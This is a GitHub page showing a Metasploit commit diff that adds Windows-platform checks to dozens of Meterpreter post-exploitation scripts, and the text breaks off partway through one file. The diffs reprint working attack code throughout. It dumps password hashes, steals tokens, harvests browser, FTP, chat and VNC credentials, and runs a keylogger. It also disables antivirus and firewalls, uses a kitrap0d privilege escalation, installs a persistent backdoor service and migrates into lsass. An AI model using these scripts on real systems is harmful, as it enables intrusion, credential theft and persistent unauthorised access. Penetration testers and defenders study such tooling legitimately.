github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-11-12 11:52:01 +01:00
Code Releases Activity

All scripts that are not platform dependednt will check for version, windows specific will only run on win32, win64 and some on PHP

Browse Source 
git-svn-id: file:///home/svn/framework3/trunk@10277 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Carlos Perez 2010-09-09 16:09:27 +00:00
parent e3a5195c62
commit 7d665e8a8d
40 changed files with 812 additions and 584 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

106
scripts/meterpreter/credcollect.rb
View File

@ -20,56 +20,60 @@ opts.parse(args) { |opt, idx, val|
end
}
# Collect even without a database to store them.
if client.framework.db.active
db_ok = true
if client.platform =~ /win32|win64/
# Collect even without a database to store them.
if client.framework.db.active
db_ok = true
else
db_ok = false
end
# Make sure we're rockin Priv and Incognito
client.core.use("priv") if not client.respond_to?("priv")
client.core.use("incognito") if not client.respond_to?("incognito")
# It wasn't me mom! Stinko did it!
hashes = client.priv.sam_hashes
# Target infos for the db record
addr = client.sock.peerhost
# client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)
# Record hashes to the running db instance
print_good "Collecting hashes..."
hashes.each do |hash|
data = {}
data[:host] = addr
data[:port] = smb_port
data[:sname] = 'smb'
data[:user] = hash.user_name
data[:pass] = hash.lanman + ":" + hash.ntlm
data[:type] = "smb_hash"
data[:active] = true
print_line " Extracted: #{data[:user]}:#{data[:pass]}"
client.framework.db.report_auth_info(data) if db_ok
end
# Record user tokens
tokens = client.incognito.incognito_list_tokens(0)
raise Rex::Script::Completed if not tokens
# Meh, tokens come to us as a formatted string
print_good "Collecting tokens..."
(tokens["delegation"] + tokens["impersonation"]).split("\n").each do |token|
data = {}
data[:host] = addr
data[:type] = 'smb_token'
data[:data] = token
data[:update] = :unique_data
print_line " #{data[:data]}"
client.framework.db.report_note(data) if db_ok
end
raise Rex::Script::Completed
else
db_ok = false
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
# Make sure we're rockin Priv and Incognito
client.core.use("priv") if not client.respond_to?("priv")
client.core.use("incognito") if not client.respond_to?("incognito")
# It wasn't me mom! Stinko did it!
hashes = client.priv.sam_hashes
# Target infos for the db record
addr = client.sock.peerhost
# client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)
# Record hashes to the running db instance
print_good "Collecting hashes..."
hashes.each do |hash|
data = {}
data[:host] = addr
data[:port] = smb_port
data[:sname] = 'smb'
data[:user] = hash.user_name
data[:pass] = hash.lanman + ":" + hash.ntlm
data[:type] = "smb_hash"
data[:active] = true
print_line " Extracted: #{data[:user]}:#{data[:pass]}"
client.framework.db.report_auth_info(data) if db_ok
end
# Record user tokens
tokens = client.incognito.incognito_list_tokens(0)
raise Rex::Script::Completed if not tokens
# Meh, tokens come to us as a formatted string
print_good "Collecting tokens..."
(tokens["delegation"] + tokens["impersonation"]).split("\n").each do |token|
data = {}
data[:host] = addr
data[:type] = 'smb_token'
data[:data] = token
data[:update] = :unique_data
print_line " #{data[:data]}"
client.framework.db.report_note(data) if db_ok
end
raise Rex::Script::Completed

8
scripts/meterpreter/domain_list_gen.rb
View File

@ -17,6 +17,11 @@ opts.parse(args) { |opt, idx, val|
raise Rex::Script::Completed
end
}
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
#-------------------------------------------------------------------------------
#Set General Variables used in the script
@client = client
@ -27,6 +32,8 @@ current_user = client.sys.config.getuid.scan(/\S*\\(.*)/)
domain = @client.fs.file.expand_path("%USERDOMAIN%")
# Create Filename info to be appended to downloaded files
filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
platform = client.platform.scan(/(win32|win64|php)/)
unsupported if not platform
# Create a directory for the logs
logs = ::File.join(Msf::Config.log_directory, 'scripts','domain_admins')
# Create the log directory
@ -45,6 +52,7 @@ while(d = r.channel.read)
print_error("Could not enumerate Domain Admins!")
raise Rex::Script::Completed
end
break if d == ""
end
#split output in to lines
out_lines = users.split("\n")

35
scripts/meterpreter/dumplinks.rb
View File

@ -64,7 +64,7 @@ def enum_users(os)
userpath = nil
useroffcpath = nil
sysdrv = @client.fs.file.expand_path("%SystemDrive%")
if os =~ /7|Vista|2008/
if os =~ /Windows 7|Vista|2008/
userpath = sysdrv + "\\Users\\"
lnkpath = "\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\"
officelnkpath = "\\AppData\\Roaming\\Microsoft\\Office\\Recent\\"
@ -96,7 +96,7 @@ def enum_users(os)
return users
end
# This is a hack because meterpreter doesn't support exists?(file)
# This is a hack because Meterpreter doesn't support exists?(file)
def dir_entry_exists(path)
files = @client.fs.dir.entries(path)
rescue
@ -363,19 +363,22 @@ def get_time(lo_byte, hi_byte)
end
return time
end
enum_users(os).each do |user|
if user['userpath']
print_status "Extracting lnk files for user #{user['username']} at #{user['userpath']}..."
extract_lnk_info(user['userpath'])
else
print_status "No Recent directory found for user #{user['username']}. Nothing to do."
end
if user['useroffcpath']
print_status "Extracting lnk files for user #{user['username']} at #{user['useroffcpath']}..."
extract_lnk_info(user['useroffcpath'])
else
print_status "No Recent Office files found for user #{user['username']}. Nothing to do."
if client.platform =~ /win32|win64/
enum_users(os).each do |user|
if user['userpath']
print_status "Extracting lnk files for user #{user['username']} at #{user['userpath']}..."
extract_lnk_info(user['userpath'])
else
print_status "No Recent directory found for user #{user['username']}. Nothing to do."
end
if user['useroffcpath']
print_status "Extracting lnk files for user #{user['username']} at #{user['useroffcpath']}..."
extract_lnk_info(user['useroffcpath'])
else
print_status "No Recent Office files found for user #{user['username']}. Nothing to do."
end
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

56
scripts/meterpreter/enum_firefox.rb
View File

@ -249,34 +249,38 @@ end
kill_frfx = true
end
}
if frfxchk
user = @client.sys.config.getuid
if user != "NT AUTHORITY\\SYSTEM"
usrname = @client.fs.file.expand_path("%USERNAME%")
db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
if kill_frfx
kill_firefox
end
print_status("Extracting Firefox data for user #{usrname}")
frfxpswd(db_path,usrname)
frfxplacesget(db_path,usrname)
frfxdmp(usrname)
else
registry_enumkeys("HKU").each do |sid|
if sid =~ /S-1-5-21-\d*-\d*-\d*-\d{4}$/
key_base = "HKU\\#{sid}"
usrname = registry_getvaldata("#{key_base}\\Volatile Environment","USERNAME")
db_path = registry_getvaldata("#{key_base}\\Volatile Environment","APPDATA") + "\\Mozilla\\Firefox\\Profiles"
if kill_frfx
kill_firefox
if client.platform =~ /win32|win64/
if frfxchk
user = @client.sys.config.getuid
if user != "NT AUTHORITY\\SYSTEM"
usrname = @client.fs.file.expand_path("%USERNAME%")
db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
if kill_frfx
kill_firefox
end
print_status("Extracting Firefox data for user #{usrname}")
frfxpswd(db_path,usrname)
frfxplacesget(db_path,usrname)
frfxdmp(usrname)
else
registry_enumkeys("HKU").each do |sid|
if sid =~ /S-1-5-21-\d*-\d*-\d*-\d{4}$/
key_base = "HKU\\#{sid}"
usrname = registry_getvaldata("#{key_base}\\Volatile Environment","USERNAME")
db_path = registry_getvaldata("#{key_base}\\Volatile Environment","APPDATA") + "\\Mozilla\\Firefox\\Profiles"
if kill_frfx
kill_firefox
end
print_status("Extracting Firefox data for user #{usrname}")
frfxpswd(db_path,usrname)
frfxplacesget(db_path,usrname)
frfxdmp(usrname)
end
print_status("Extracting Firefox data for user #{usrname}")
frfxpswd(db_path,usrname)
frfxplacesget(db_path,usrname)
frfxdmp(usrname)
end
end
end
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

11
scripts/meterpreter/enum_logged_on_users.rb
View File

@ -81,8 +81,13 @@ end
ls_current
end
}
if args.length == 0
print_line "Meterpreter Script for enumerating Current logged users and users that have loged in to the system."
print_line(@@exec_opts.usage)
if client.platform =~ /win32|win64/
if args.length == 0
print_line "Meterpreter Script for enumerating Current logged users and users that have loged in to the system."
print_line(@@exec_opts.usage)
raise Rex::Script::Completed
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

7
scripts/meterpreter/enum_powershell_env.rb
View File

@ -118,4 +118,9 @@ def enum_powershell
end
end
enum_powershell
if client.platform =~ /win32|win64/
enum_powershell
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

13
scripts/meterpreter/enum_putty.rb
View File

@ -86,9 +86,14 @@ def enum_saved_sessions(reg_key_base)
end
end
end
hkcu_base.each do |hkb|
if check_putty(hkb)
enum_known_ssh_hosts(hkb)
enum_saved_sessions(hkb)
if client.platform =~ /win32|win64/
hkcu_base.each do |hkb|
if check_putty(hkb)
enum_known_ssh_hosts(hkb)
enum_saved_sessions(hkb)
end
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

51
scripts/meterpreter/enum_vmware.rb
View File

@ -292,30 +292,35 @@ def enum_vmwarewrk
end
end
end
if check_vmsoft
vmware_products = check_prods()
if vmware_products.include?("VMware VirtualCenter")
enum_vcenter
end
if vmware_products.include?("VMware Virtual Infrastructure Client")
enum_viclient
end
if vmware_products.include?("VMware Update Manager")
enum_vum
end
if client.platform =~ /win32|win64/
if check_vmsoft
vmware_products = check_prods()
if vmware_products.include?("VMware VirtualCenter")
enum_vcenter
end
if vmware_products.include?("VMware Virtual Infrastructure Client")
enum_viclient
end
if vmware_products.include?("VMware Update Manager")
enum_vum
end
if vmware_products.include?("VMware VDM")
enum_vdm
end
if vmware_products.include?("VMware vSphere PowerCLI")
enum_powercli
end
if vmware_products.include?("VMware vSphere Host Update Utility 4.0")
enum_vihosupdt
end
if vmware_products.include?("VMware Workstation")
enum_vmwarewrk
if vmware_products.include?("VMware VDM")
enum_vdm
end
if vmware_products.include?("VMware vSphere PowerCLI")
enum_powercli
end
if vmware_products.include?("VMware vSphere Host Update Utility 4.0")
enum_vihosupdt
end
if vmware_products.include?("VMware Workstation")
enum_vmwarewrk
end
else
print_status("No VMware Products appear to be installed in this host")
end
else
print_status("No VMware Products appear to be installed in this host")
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

7
scripts/meterpreter/get_env.rb
View File

@ -35,4 +35,9 @@ opts.parse(args) { |opt, idx, val|
end
}
list_env_vars(var_names)
if client.platform =~ /win32|win64/
list_env_vars(var_names)
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

37
scripts/meterpreter/get_filezilla_creds.rb
View File

@ -147,23 +147,28 @@ def enum_users(os)
end
################## MAIN ##################
print_status("Running Meterpreter FileZilla Credential harvester script")
print_status("All services are logged at #{dest}")
enum_users(os).each do |u|
print_status("Checking if Filezilla profile is present for user :::#{u['username']}:::...")
### Find the path (if it exists) for this user,
filezilla_path = check_filezilla(u['userappdata'])
if filezilla_path
print_status("FileZilla profile found!")
### modified to use filezilla_path
xml_cfg_files = ['sitemanager.xml','recentservers.xml']
if get_credentials
xml_cfg_files.each do |xml_cfg_file|
file_local_write(dest,extract_saved_creds(filezilla_path,xml_cfg_file))
if client.platform =~ /win32|win64/
print_status("Running Meterpreter FileZilla Credential harvester script")
print_status("All services are logged at #{dest}")
enum_users(os).each do |u|
print_status("Checking if Filezilla profile is present for user :::#{u['username']}:::...")
### Find the path (if it exists) for this user,
filezilla_path = check_filezilla(u['userappdata'])
if filezilla_path
print_status("FileZilla profile found!")
### modified to use filezilla_path
xml_cfg_files = ['sitemanager.xml','recentservers.xml']
if get_credentials
xml_cfg_files.each do |xml_cfg_file|
file_local_write(dest,extract_saved_creds(filezilla_path,xml_cfg_file))
end
end
else
print_error("Filezilla profile not found!")
end
else
print_error("Filezilla profile not found!")
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

47
scripts/meterpreter/get_pidgin_creds.rb
View File

@ -178,26 +178,31 @@ end
#-------------------------------------------------------------------------------
################## MAIN ##################
print_status("Running Meterpreter Pidgin Credential harvester script")
print_status("All services are logged at #{dest}")
enum_users(os).each do |u|
print_status("Checking if Pidgin profile is present for user :::#{u['username']}:::...")
### Find the path (if it exists) for this user,
pidgin_path = check_pidgin(u['userappdata'])
if pidgin_path
print_status("Pidgin profile found!")
### modified to use pidgin_path
if get_credentials
file_local_write(dest,extract_creds(pidgin_path))
if client.platform =~ /win32|win64/
print_status("Running Meterpreter Pidgin Credential harvester script")
print_status("All services are logged at #{dest}")
enum_users(os).each do |u|
print_status("Checking if Pidgin profile is present for user :::#{u['username']}:::...")
### Find the path (if it exists) for this user,
pidgin_path = check_pidgin(u['userappdata'])
if pidgin_path
print_status("Pidgin profile found!")
### modified to use pidgin_path
if get_credentials
file_local_write(dest,extract_creds(pidgin_path))
end
if get_buddies
file_local_write(dest,extract_buddies(pidgin_path))
print_status("Buddie list has been saved to the log file.")
end
if get_logs
download_logs(logs,pidgin_path)
end
else
print_error("Pidgin profile not found!")
end
if get_buddies
file_local_write(dest,extract_buddies(pidgin_path))
print_status("Buddie list has been saved to the log file.")
end
if get_logs
download_logs(logs,pidgin_path)
end
else
print_error("Pidgin profile not found!")
end
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

24
scripts/meterpreter/getcountermeasure.rb
View File

@ -357,14 +357,18 @@ killfw = false
end
}
# get the version of windows
wnvr = session.sys.config.sysinfo["OS"]
print_status("Running Getcountermeasure on the target...")
check(session,avs,killbt)
if wnvr !~ /Windows 2000/
checklocalfw(session, killfw)
checkdep(session)
if client.platform =~ /win32|win64/
wnvr = session.sys.config.sysinfo["OS"]
print_status("Running Getcountermeasure on the target...")
check(session,avs,killbt)
if wnvr !~ /Windows 2000/
checklocalfw(session, killfw)
checkdep(session)
end
if wnvr =~ /Windows Vista/
checkuac(session)
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
if wnvr =~ /Windows Vista/
checkuac(session)
end

40
scripts/meterpreter/getgui.rb
View File

@ -161,27 +161,31 @@ frwrd = nil
end
}
if args.length > 0
if enbl or (usr and pass)
message
if enbl
enablerd()
enabletssrv()
if client.platform =~ /win32|win64/
if args.length > 0
if enbl or (usr and pass)
message
if enbl
enablerd()
enabletssrv()
end
if usr and pass
langdetect(lang)
addrdpusr(session, usr, pass, lang)
end
if frwrd == true
print_status("Starting the port forwarding at local port #{lport}")
client.run_cmd("portfwd add -L 0.0.0.0 -l #{lport} -p 3389 -r 127.0.0.1")
end
print_status("For cleanup use command: run multi_console_command -rc #{@dest}")
else
usage
end
if usr and pass
langdetect(lang)
addrdpusr(session, usr, pass, lang)
end
if frwrd == true
print_status("Starting the port forwarding at local port #{lport}")
client.run_cmd("portfwd add -L 0.0.0.0 -l #{lport} -p 3389 -r 127.0.0.1")
end
print_status("For cleanup use command: run multi_console_command -rc #{@dest}")
else
usage
end
else
usage
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

12
scripts/meterpreter/gettelnet.rb
View File

@ -119,6 +119,15 @@ def usage
print_line(@@exec_opts.usage)
raise Rex::Script::Completed
end
#check for proper Meterpreter Platform
def unsupported
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
################## MAIN ##################
# Parsing of Options
usr = nil
@ -140,6 +149,9 @@ enbl = nil
end
}
platform = client.platform.scan(/(win32|win64)/)
unsupported if not platform
if enbl
message
insttlntsrv(session)

7
scripts/meterpreter/getvncpw.rb
View File

@ -75,7 +75,7 @@ keytosearch = nil
keytosearch = val
end
}
if client.platform =~ /win32|win64/
if keytosearch == nil
print_status("Searching for VNC Passwords in the registry....")
keys.each { |key|
@ -97,4 +97,7 @@ else
print_status("Not found")
end
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

73
scripts/meterpreter/hashdump.rb
View File

@ -219,45 +219,48 @@ def decrypt_user_hash(rid, hbootkey, enchash, pass)
d1o << d2.final
d1o + d2o
end
if client.platform =~ /win32|win64/
begin
begin
print_status("Obtaining the boot key...")
bootkey = capture_boot_key
print_status("Obtaining the boot key...")
bootkey = capture_boot_key
print_status("Calculating the hboot key using SYSKEY #{bootkey.unpack("H*")[0]}...")
hbootkey = capture_hboot_key(bootkey)
print_status("Calculating the hboot key using SYSKEY #{bootkey.unpack("H*")[0]}...")
hbootkey = capture_hboot_key(bootkey)
print_status("Obtaining the user list and keys...")
users = capture_user_keys
print_status("Obtaining the user list and keys...")
users = capture_user_keys
print_status("Decrypting user keys...")
users = decrypt_user_keys(hbootkey, users)
print_status("Decrypting user keys...")
users = decrypt_user_keys(hbootkey, users)
print_status("Dumping password hashes...")
print_line()
print_line()
users.keys.sort{|a,b| a<=>b}.each do |rid|
hashstring = "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::"
@client.framework.db.report_auth_info(
:host => client.sock.peerhost,
:port => smb_port,
:sname => 'smb',
:user => users[rid][:Name],
:pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
:type => "smb_hash"
)
print_line hashstring
end
print_line()
print_line()
print_status("Dumping password hashes...")
print_line()
print_line()
users.keys.sort{|a,b| a<=>b}.each do |rid|
hashstring = "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::"
@client.framework.db.report_auth_info(
:host => client.sock.peerhost,
:port => smb_port,
:sname => 'smb',
:user => users[rid][:Name],
:pass => users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
:type => "smb_hash"
)
print_line hashstring
rescue ::Interrupt
raise $!
rescue ::Rex::Post::Meterpreter::RequestError => e
print_error("Meterpreter Exception: #{e.class} #{e}")
print_error("This script requires the use of a SYSTEM user context (hint: migrate into service process)")
rescue ::Exception => e
print_error("Error: #{e.class} #{e} #{e.backtrace}")
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
print_line()
print_line()
rescue ::Interrupt
raise $!
rescue ::Rex::Post::Meterpreter::RequestError => e
print_error("Meterpreter Exception: #{e.class} #{e}")
print_error("This script requires the use of a SYSTEM user context (hint: migrate into service process)")
rescue ::Exception => e
print_error("Error: #{e.class} #{e} #{e.backtrace}")
end

48
scripts/meterpreter/hostsedit.rb
View File

@ -35,7 +35,7 @@ hosts = session.fs.file.expand_path("%SYSTEMROOT%")+"\\System32\\drivers\\etc\\h
#Function check if UAC is enabled
def checkuac(session)
winver = session.sys.config.sysinfo
if winver["OS"] =~ (/Windows Vista/)
if winver["OS"] =~ (/Windows 7|Vista/)
print_status("Checking if UAC is enabled.")
open_key = session.sys.registry.open_key(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", KEY_READ)
value = open_key.query_value("EnableLUA").data
@ -67,29 +67,33 @@ def cleardnscach(session)
print_status("Clearing the DNS Cache")
session.sys.process.execute("cmd /c ipconfig /flushdns",nil, {'Hidden' => true})
end
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-e"
checkuac(session)
backuphosts(session,hosts)
add2hosts(session,val,hosts)
cleardnscach(session)
when "-l"
checkuac(session)
if not ::File.exists?(val)
raise "File #{val} does not exists!"
else
if client.platform =~ /win32|win64/
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-e"
checkuac(session)
backuphosts(session,hosts)
::File.open(val, "r").each_line do |line|
add2hosts(session,line.chomp,hosts)
end
add2hosts(session,val,hosts)
cleardnscach(session)
when "-l"
checkuac(session)
if not ::File.exists?(val)
raise "File #{val} does not exists!"
else
backuphosts(session,hosts)
::File.open(val, "r").each_line do |line|
add2hosts(session,line.chomp,hosts)
end
cleardnscach(session)
end
when "-h"
usage
end
when "-h"
}
if args.length == 0
usage
end
}
if args.length == 0
usage
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

13
scripts/meterpreter/keylogrecorder.rb
View File

@ -161,8 +161,13 @@ lock = false
lock = true
end
}
if explrmigrate(session,captype,lock)
if startkeylogger(session)
keycap(session, keytime, logfile)
if client.platform =~ /win32|win64/
if explrmigrate(session,captype,lock)
if startkeylogger(session)
keycap(session, keytime, logfile)
end
end
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

109
scripts/meterpreter/kitrap0d.rb
View File

@ -38,59 +38,62 @@ def m_exec(session, cmd)
r.close
b
end
if client.platform =~ /win32|win64/
# Handle exceptions in the getuid() call
begin
print_status("Currently running as " + client.sys.config.getuid)
print_line("")
rescue ::Rex::Post::Meterpreter::RequestError
end
# Handle exceptions in the getuid() call
begin
print_status("Currently running as " + client.sys.config.getuid)
print_status("Loading the vdmallowed executable and DLL from the local system...")
based = ::File.join(Msf::Config.install_root, "data", "exploits", "kitrap0d")
exp = ::File.join(based, "vdmallowed.exe")
dll = ::File.join(based, "vdmexploit.dll")
expdata = ""
::File.open(exp, "rb") do |fd|
expdata = fd.read(fd.stat.size)
end
dlldata = ""
::File.open(dll, "rb") do |fd|
dlldata = fd.read(fd.stat.size)
end
tempdir = client.fs.file.expand_path("%TEMP%")
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Uploading vdmallowed to #{tempexe}...")
fd = client.fs.file.new(tempexe, "wb")
fd.write(expdata)
fd.close
tempdir = client.fs.file.expand_path("%TEMP%")
tempdll = tempdir + "\\" + "vdmexploit.dll"
print_status("Uploading vdmallowed to #{tempdll}...")
fd = client.fs.file.new(tempdll, "wb")
fd.write(dlldata)
fd.close
server = client.sys.process.open
print_status("Escalating our process (PID:#{server.pid})...")
print_line("")
rescue ::Rex::Post::Meterpreter::RequestError
tempdrive = tempdir.split(':')[0]
data = m_exec(client, "cmd.exe /c #{tempdrive}: & cd \"#{tempdir}\" & #{tempexe} #{server.pid}")
print_line(data)
print_status("Deleting files...")
client.fs.file.rm(tempexe)
client.fs.file.rm(tempdll)
# Handle exceptions in the getuid() call
begin
print_status("Now running as " + client.sys.config.getuid)
rescue ::Rex::Post::Meterpreter::RequestError
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
print_status("Loading the vdmallowed executable and DLL from the local system...")
based = ::File.join(Msf::Config.install_root, "data", "exploits", "kitrap0d")
exp = ::File.join(based, "vdmallowed.exe")
dll = ::File.join(based, "vdmexploit.dll")
expdata = ""
::File.open(exp, "rb") do |fd|
expdata = fd.read(fd.stat.size)
end
dlldata = ""
::File.open(dll, "rb") do |fd|
dlldata = fd.read(fd.stat.size)
end
tempdir = client.fs.file.expand_path("%TEMP%")
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Uploading vdmallowed to #{tempexe}...")
fd = client.fs.file.new(tempexe, "wb")
fd.write(expdata)
fd.close
tempdir = client.fs.file.expand_path("%TEMP%")
tempdll = tempdir + "\\" + "vdmexploit.dll"
print_status("Uploading vdmallowed to #{tempdll}...")
fd = client.fs.file.new(tempdll, "wb")
fd.write(dlldata)
fd.close
server = client.sys.process.open
print_status("Escalating our process (PID:#{server.pid})...")
print_line("")
tempdrive = tempdir.split(':')[0]
data = m_exec(client, "cmd.exe /c #{tempdrive}: & cd \"#{tempdir}\" & #{tempexe} #{server.pid}")
print_line(data)
print_status("Deleting files...")
client.fs.file.rm(tempexe)
client.fs.file.rm(tempdll)
# Handle exceptions in the getuid() call
begin
print_status("Now running as " + client.sys.config.getuid)
rescue ::Rex::Post::Meterpreter::RequestError
end

154
scripts/meterpreter/metsvc.rb
View File

@ -36,83 +36,87 @@ rport = 31337
install = false
autoconn = false
remove = false
if client.platform =~ /win32|win64/
#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print_line(opts.usage)
raise Rex::Script::Completed
when "-A"
autoconn = true
when "-r"
remove = true
#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print_line(opts.usage)
raise Rex::Script::Completed
when "-A"
autoconn = true
when "-r"
remove = true
end
end
end
#
# Create the persistent VBS
#
#
# Create the persistent VBS
#
if(not remove)
print_status("Creating a meterpreter service on port #{rport}")
else
print_status("Removing the existing Meterpreter service")
end
#
# Upload to the filesystem
#
tempdir = client.fs.file.expand_path("%TEMP%") + "\\" + Rex::Text.rand_text_alpha(rand(8)+8)
print_status("Creating a temporary installation directory #{tempdir}...")
client.fs.dir.mkdir(tempdir)
%W{ metsrv.dll metsvc-server.exe metsvc.exe }.each do |bin|
next if (bin != "metsvc.exe" and remove)
print_status(" >> Uploading #{bin}...")
fd = client.fs.file.new(tempdir + "\\" + bin, "wb")
fd.write(::File.read(File.join(based, bin), ::File.size(::File.join(based, bin))))
fd.close
end
#
# Execute the agent
#
if(not remove)
print_status("Starting the service...")
client.fs.dir.chdir(tempdir)
data = m_exec(client, "metsvc.exe install-service")
print_line("\t#{data}")
else
print_status("Stopping the service...")
client.fs.dir.chdir(tempdir)
data = m_exec(client, "metsvc.exe remove-service")
print_line("\t#{data}")
end
if(remove)
m_exec(client, "cmd.exe /c del metsvc.exe")
end
#
# Setup the multi/handler if requested
#
if(autoconn)
print_status("Trying to connect to the Meterpreter service at #{client.tunnel_peer.split(':')[0]}:#{rport}...")
mul = client.framework.exploits.create("multi/handler")
mul.datastore['WORKSPACE'] = client.workspace
mul.datastore['PAYLOAD'] = "windows/metsvc_bind_tcp"
mul.datastore['LPORT'] = rport
mul.datastore['RHOST'] = client.tunnel_peer.split(':')[0]
mul.datastore['ExitOnSession'] = false
mul.exploit_simple(
'Payload' => mul.datastore['PAYLOAD'],
'RunAsJob' => true
)
end
if(not remove)
print_status("Creating a meterpreter service on port #{rport}")
else
print_status("Removing the existing Meterpreter service")
end
#
# Upload to the filesystem
#
tempdir = client.fs.file.expand_path("%TEMP%") + "\\" + Rex::Text.rand_text_alpha(rand(8)+8)
print_status("Creating a temporary installation directory #{tempdir}...")
client.fs.dir.mkdir(tempdir)
%W{ metsrv.dll metsvc-server.exe metsvc.exe }.each do |bin|
next if (bin != "metsvc.exe" and remove)
print_status(" >> Uploading #{bin}...")
fd = client.fs.file.new(tempdir + "\\" + bin, "wb")
fd.write(::File.read(File.join(based, bin), ::File.size(::File.join(based, bin))))
fd.close
end
#
# Execute the agent
#
if(not remove)
print_status("Starting the service...")
client.fs.dir.chdir(tempdir)
data = m_exec(client, "metsvc.exe install-service")
print_line("\t#{data}")
else
print_status("Stopping the service...")
client.fs.dir.chdir(tempdir)
data = m_exec(client, "metsvc.exe remove-service")
print_line("\t#{data}")
end
if(remove)
m_exec(client, "cmd.exe /c del metsvc.exe")
end
#
# Setup the multi/handler if requested
#
if(autoconn)
print_status("Trying to connect to the Meterpreter service at #{client.tunnel_peer.split(':')[0]}:#{rport}...")
mul = client.framework.exploits.create("multi/handler")
mul.datastore['WORKSPACE'] = client.workspace
mul.datastore['PAYLOAD'] = "windows/metsvc_bind_tcp"
mul.datastore['LPORT'] = rport
mul.datastore['RHOST'] = client.tunnel_peer.split(':')[0]
mul.datastore['ExitOnSession'] = false
mul.exploit_simple(
'Payload' => mul.datastore['PAYLOAD'],
'RunAsJob' => true
)
end
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end

63
scripts/meterpreter/migrate.rb
View File

@ -28,40 +28,45 @@ opts.parse(args) { |opt, idx, val|
if client.platform =~ /win32|win64/
server = client.sys.process.open
server = client.sys.process.open
print_status("Current server process: #{server.name} (#{server.pid})")
print_status("Current server process: #{server.name} (#{server.pid})")
target_pid = nil
target_pid = nil
if ! spawn
# Get the target process name
target ||= "lsass.exe"
print_status("Migrating to #{target}...")
if ! spawn
# Get the target process name
target ||= "lsass.exe"
print_status("Migrating to #{target}...")
# Get the target process pid
target_pid = client.sys.process[target]
# Get the target process pid
target_pid = client.sys.process[target]
if not target_pid
print_error("Could not access the target process")
print_status("Spawning a notepad.exe host process...")
note = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
target_pid = note.pid
if not target_pid
print_error("Could not access the target process")
print_status("Spawning a notepad.exe host process...")
note = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
target_pid = note.pid
end
else
target ||= "notepad.exe"
print_status("Spawning a #{target} host process...")
newproc = client.sys.process.execute(target, nil, {'Hidden' => true })
target_pid = newproc.pid
if not target_pid
print_error("Could not create a process around #{target}")
raise Rex::Script::Completed
end
end
# Do the migration
print_status("Migrating into process ID #{target_pid}")
client.core.migrate(target_pid)
server = client.sys.process.open
print_status("New server process: #{server.name} (#{server.pid})")
else
target ||= "notepad.exe"
print_status("Spawning a #{target} host process...")
newproc = client.sys.process.execute(target, nil, {'Hidden' => true })
target_pid = newproc.pid
if not target_pid
print_error("Could not create a process around #{target}")
raise Rex::Script::Completed
end
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end
# Do the migration
print_status("Migrating into process ID #{target_pid}")
client.core.migrate(target_pid)
server = client.sys.process.open
print_status("New server process: #{server.name} (#{server.pid})")

47
scripts/meterpreter/netenum.rb
View File

@ -303,25 +303,30 @@ srvrc = nil
end
}
if client.platform =~ /win32|win64/
if range != nil && pngsp == 1
message(logs)
pingsweep(session,range,dest)
elsif range != nil && rvrslkp == 1
message(logs)
reverselookup(session,range,dest)
elsif dom != nil && hostlist!= nil && frdlkp == 1
message(logs)
frwdlp(session,hostlist,dom,dest)
elsif dom != nil && stdlkp == 1
message(logs)
stdlookup(session,dom,dest)
elsif dom != nil && srvrc == 1
message(logs)
